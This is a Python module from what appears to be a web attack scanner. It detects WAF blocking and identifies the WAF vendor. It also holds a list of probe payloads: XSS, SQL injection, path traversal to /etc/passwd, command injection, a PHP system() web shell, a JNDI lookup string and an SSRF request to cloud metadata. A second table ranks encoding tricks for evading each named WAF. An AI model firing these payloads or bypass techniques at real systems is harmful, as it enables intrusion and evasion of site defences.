"""
core/waf.py
===========

Detecção de bloqueio por WAF/IPS e identificação de fabricante.

Duas perguntas independentes:
  - ESTE request foi bloqueado?  (status de bloqueio / página de bloqueio /
    comportamento divergente do baseline)
  - QUEM é o WAF?  (fingerprint em headers e corpo)

Quando um bloqueio é detectado num parâmetro, a engine escala aquele parâmetro
para o arsenal de evasão (double/triple encode, polimórfico, poliglota,
encadeamento) e re-testa — ver core/engine.py.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

from .http_client import Response

# status típicos de bloqueio
BLOCK_STATUS = {403, 406, 429, 456, 501, 503}

# frases de página de bloqueio (corpo)
BLOCK_PHRASES = [
    r"access denied",
    r"request blocked",
    r"has been blocked",
    r"web application firewall",
    r"blocked by",
    r"request (was )?rejected",
    r"malicious",
    r"security (policy|violation|rule)",
    r"unusual traffic",
    r"attention required",
    r"incident id",
    r"support id",
    r"reference\s*#",
    r"forbidden",
    r"not acceptable",
    r"your request looks",
    r"this request was blocked",
]
_BLOCK_RX = re.compile("|".join(BLOCK_PHRASES), re.IGNORECASE)

# fingerprints de fabricante: (nome, regex_header_or_body)
VENDORS = [
    ("Cloudflare", re.compile(r"cloudflare|__cf|cf-ray|attention required", re.I)),
    ("Akamai", re.compile(r"akamaighost|akamai|reference\s*#\d", re.I)),
    ("Imperva/Incapsula", re.compile(r"incapsula|_incapsula_|x-iinfo|imperva", re.I)),
    ("ModSecurity", re.compile(r"mod_security|modsecurity|not acceptable", re.I)),
    ("AWS WAF", re.compile(r"awselb|x-amzn|aws.?waf", re.I)),
    ("Sucuri", re.compile(r"sucuri|x-sucuri", re.I)),
    ("F5 BIG-IP", re.compile(r"big-?ip|the requested url was rejected|support id", re.I)),
    ("Barracuda", re.compile(r"barracuda", re.I)),
    ("FortiWeb", re.compile(r"fortiweb|fortigate|\.fgd_icon", re.I)),
    ("Wordfence", re.compile(r"wordfence|generated by wordfence", re.I)),
    ("Naxsi", re.compile(r"naxsi", re.I)),
    ("DotDefender", re.compile(r"dotdefender", re.I)),
    ("Citrix NetScaler", re.compile(r"netscaler|ns_af|citrix", re.I)),
    ("Fastly", re.compile(r"fastly", re.I)),
]


# erros de transporte que indicam DROP de rede (WAF/IPS) vs erro local nosso
_NET_DROP = ("reset", "timeout", "readerror", "connecterror", "remoteprotocol",
             "connectionterminated", "peer", "eof", "readtimeout", "connecttimeout")
_LOCAL_ERR = ("invalidurl", "localprotocol", "unsupportedprotocol", "too long",
              "missingschema", "urlrequired")


@dataclass
class WafSignal:
    blocked: bool
    vendor: Optional[str] = None
    reason: str = ""
    kind: Optional[str] = None   # "status" | "page" | "drop" | None

    def __bool__(self):
        return self.blocked


def _haystack(resp: Response) -> str:
    hdr = " ".join(f"{k}: {v}" for k, v in (resp.headers or {}).items())
    return (hdr + "\n" + (resp.text or ""))[:8000]


def identify_vendor(resp: Response) -> Optional[str]:
    hay = _haystack(resp)
    for name, rx in VENDORS:
        if rx.search(hay):
            return name
    return None


# ---------------------------------------------------------------------------
# Fingerprint ATIVO — payloads-sonda que confiavelmente disparam WAFs
# ---------------------------------------------------------------------------
PROBES = [
    ("xss", "<script>alert(1)</script>"),
    ("xss2", "\"><img src=x onerror=alert(1)>"),
    ("sqli", "' OR 1=1-- -"),
    ("sqli2", "1 UNION SELECT NULL,NULL,NULL-- -"),
    ("lfi", "../../../../../../etc/passwd"),
    ("cmdi", ";cat /etc/passwd|id"),
    ("rce", "<?php system($_GET[0]);?>"),
    ("proto", "${jndi:ldap://x/a}"),
    ("ssrf", "http://169.254.169.254/latest/meta-data/"),
]


# perfis de evasão priorizados por fabricante (encoders que historicamente
# furam melhor cada WAF). O que não estiver listado é anexado do EVASION geral.
EVASION_PROFILES = {
    "Cloudflare": ["best_fit", "fullwidth", "poly_mix", "case_random",
                   "utf8_overlong", "url_double", "poly_percent", "unicode_iis"],
    "Akamai": ["url_double", "double_url_all", "url_hex_mixed", "poly_percent",
               "utf8_overlong3", "best_fit"],
    "Imperva/Incapsula": ["best_fit", "fullwidth", "poly_mix", "utf8_overlong",
                          "url_hex_mixed", "null_multi"],
    "ModSecurity": ["poly_sql_noise", "sql_comment_between", "cmd_quote",
                    "poly_ws", "url_double", "best_fit", "case_random"],
    "AWS WAF": ["double_url_all", "triple_url_all", "url_hex_mixed",
                "poly_percent", "best_fit"],
    "F5 BIG-IP": ["url_double", "best_fit", "poly_mix", "utf8_overlong3", "case_random"],
    "FortiWeb": ["poly_mix", "url_double", "best_fit", "poly_ws"],
    "Sucuri": ["poly_mix", "url_double", "case_random", "best_fit"],
    "Barracuda": ["url_double", "poly_percent", "best_fit", "poly_ws"],
    "Citrix NetScaler": ["url_double", "poly_mix", "best_fit"],
}


def evasion_for(vendor: Optional[str], full_evasion: list) -> list:
    """Ordena o arsenal de evasão priorizando o perfil do fabricante."""
    pref = EVASION_PROFILES.get(vendor or "", [])
    rest = [t for t in full_evasion if t not in pref]
    return pref + rest


def inspect(resp: Response, baseline: Optional[Response] = None) -> WafSignal:
    """Decide se ESTE request foi bloqueado, comparando com o baseline."""
    vendor = identify_vendor(resp)

    base_ok = baseline is None or (baseline.ok and baseline.status not in BLOCK_STATUS)

    # 1) status de bloqueio (confiável) e o baseline não era bloqueado
    if resp.status in BLOCK_STATUS and base_ok:
        return WafSignal(True, vendor, f"status {resp.status}", kind="status")

    # 3) página de bloqueio no corpo que NÃO estava no baseline (confiável)
    if resp.ok and resp.text and _BLOCK_RX.search(resp.text):
        if baseline is None or not (baseline.text and _BLOCK_RX.search(baseline.text)):
            m = _BLOCK_RX.search(resp.text)
            return WafSignal(True, vendor, f"página de bloqueio: {m.group(0)!r}", kind="page")

    # 2) conexão derrubada (drop/reset de IPS) — sinal FRACO: só vale se for
    #    erro de REDE (não erro local montando o request) e a engine exige que
    #    seja SISTEMÁTICO (muitos drops) antes de declarar WAF.
    if (not resp.ok) and baseline is not None and baseline.ok:
        e = (resp.error or "").lower()
        if any(x in e for x in _LOCAL_ERR):
            return WafSignal(False, vendor, "")            # erro nosso, ignora
        if any(x in e for x in _NET_DROP):
            return WafSignal(True, vendor, f"conexão derrubada ({resp.error})", kind="drop")

    return WafSignal(False, vendor, "")
